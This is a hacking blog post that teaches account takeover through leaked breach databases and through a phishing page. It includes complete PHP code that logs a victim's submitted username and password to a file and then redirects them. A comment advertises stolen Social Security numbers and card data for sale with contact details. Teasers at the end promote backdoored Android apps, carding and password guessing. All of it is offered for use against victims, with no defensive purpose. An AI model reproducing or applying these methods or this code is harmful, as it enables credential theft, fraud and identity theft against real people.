Skip to main content

Two Methods to Crack Password | Password Cracking |

  

 "Hacking password" is a quirky term used by teenager who want revenge or password of their girlfriend's social media but "Hacking password" has more to it .There are some people who has "Hacking password" as there professional (obviously it's self proclaimed).Here is the list of accounts you can get :

  • Netflix
  • Spotify
  • Instagram
  • Hulu
  • Facebook
  • Google...etc


Now here are 2 methods to help you to start with "Hacking password"


Method 1: Database scraping


REQUIREMENTS-  Target's Email/Username


Step 1: Go to this website here.

Step 2: Enter Email/Username & click on pwned?

Now if you get Green screen that means you can't use this method, don't worry you can try 2nd method

If you get Red screen, you are good to go.


Step 3: Now you will see sites who's data has been leaked 

Step 4: Go to hacking forums & get that data base

Step 5: Now search for that Email/Username in it.

Step 6: Voila! You just got access not only to password but also location, number .

Step 7: Now you can login into various sites using that info.

Note: most of the time , data is hashed so if you know then you can dehash it or you can get dehashed data from telegram.


Method 2: Phishing 


Phishing is the fraudulent attempt to obtain sensitive information such as username, password & credit card details by disguising as a trust worthy entity in an electronic communication.

First open the website in a browser for which you want to create a phishing page . Now right click  in an empty space and select view source , copy all the contents to a note pad and save it as something.html 

Example :  yahoo.html 


Now open Yahoo.html (something.html) in a notepad .Now search for the string 

"action = https.." and change the address tologin.php and change method = " Post" to "GET" Finally save it 


Now we have to create login.php .For this open notepad , copy/paste the following code in it and save it as login.php


 <?php

header ('Location: http://    yahoo.com');

$handle = fopen("log.txt", "a");

foreach($_GET as $variable => $value) {

fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");

}

fwrite($handle, "\r\n");

fclose($handle);

exit;

?>


Note :- By default the victim will be redirected to yahoo.com once he clicks login ,If you want you can change the address, you can do it  by changing the www.yahoo.com to any  address you desire.


Now create an account in Free web hosting sites, which supports php like  T35.comor, 000webhost.com , etc.


Now upload all the two files which we created Yahoo.html , login.php.


 Now send the  Yahoo.html link to the victim , once  he enters the information and logins in , He will be redirected to the website which we did in step three.


Now to see the victims password login to your hosting account, there you 'll see new  file log.txt , open it to see the victims user-id and password


Follow us for more -  https://linktr.ee/trickyhash


 

Comments

  1. Hey Guys !

    USA Fresh & Verified SSN Leads AVAILABLE with best connectivity
    All Leads have genuine & valid information

    **HEADERS IN LEADS**
    First Name | Last Name | SSN | Dob | DL Number |Address | State | City | Zip | Phone Number | Account Number | Bank Name

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If anyone buy in bulk, we can negotiate
    *Sampling is just for serious buyers

    ==>ACTIVE & FRESH CC FULLZ ALSO AVAILABLE<==
    ->$5 PER EACH

    ->Hope for the long term deal
    ->Interested buyers will be welcome

    **Contact 24/7**
    Whatsapp > +923172721122
    Email > leads.sellers1212@gmail.com
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  2. Harrah's Reno Casino - Mapyro
    Harrah's Reno 안산 출장샵 is located in Reno, 포항 출장마사지 Nevada and is 여주 출장안마 near the airport. Harrah's 군포 출장마사지 Reno is owned by the Eastern Band of the Cherokee Nation.Distance to airport: 2.4 miNearest airport: Reno, NV 남양주 출장안마

    ReplyDelete

Post a Comment

Popular posts from this blog

Embed Backdoor in any Android app | Android Hacking | Tricky Hash |

  H OW TO  CREATE A ANDROID TROJAN INTRO Everybody  install and use apps these days. So, the easiest way to hack a android by embed a Backdoor to a normal apk File. Now, install this apk file in your Victim's phone by using some Social Engineering trick.  When it is executed the user will see a normal app but in the same time our Backdoor will be running in the Background. REQUIREMENTS A Legitimate android apk file. Kali Linux  The FATRAT (Linux Tool) PROCEDURE   To embed Backdoor in any legitimate apk, we use fatrat. We have to install Fatrat in out terminal. Fatrat is used to generate local or remote listeners. It can generate payloads in various formats.  To Install Fatrat we'll have to use the following commands:  git clone  https://github.com/Screetsec/TheFatRat.git After cloning into TheFatRat now type: ls (enter) cd TheFatRat (enter) ls (enter) chmod +x setup.sh (enter) ls (enter) ./setup.sh (enter) It will automatically install all th...

CARDING!(BASICS,PROCEDURES,PRECAUTIONS,CONSEQUENCES)

part-1  * Why does the bank card number have #16 digits and what do these number s mean? * * 16 digits * on the card contains important information and * 6 digits * The first is the bank identification number and specifies which bank issued the card.  By examining these * 6 digits *, programmers will recognize the card issuing bank. "Brought to you by the Dark Army. * (Bank Identification Number) *   they say.  This number for some banks is as follows: Bank name Bank                       Bank Code      ----                       --------- Chemical Bank                    1263 Marine Midland                   6207 [1207?] Manufacturers Hanover Trust      1033 Citibank               ...

How to Guess any Password like Hackers Do | Password Cracking | Ethical Hacking |

In this article, I am going to tell you how Hackers and Crackers crack the password by Guessing. After reading this, you will be able to start think like a hacker. They use some methodologies while guessing and cracking passwords. So let's dive into it:  1. Guess the most common passwords At the end of every year, a list of the 25 most common passwords is released. These passwords are the easiest to guess and thus the most commonly hacked. Though you should avoid picking any of these passwords for yourself, try guessing from this list of passwords: 123456@  12345678  abc123  qwerty  monkey  letmein  dragon  baseball iloveyou  trustno1 1234567  sunshine  master  123123  welcome  shadow  Ashley  football  Jesus  Michael  ninja  mypassword  password1 2. Use some common password tricks  Other than guessing the most obvious passwords, there are a some tricks that are used by hackers....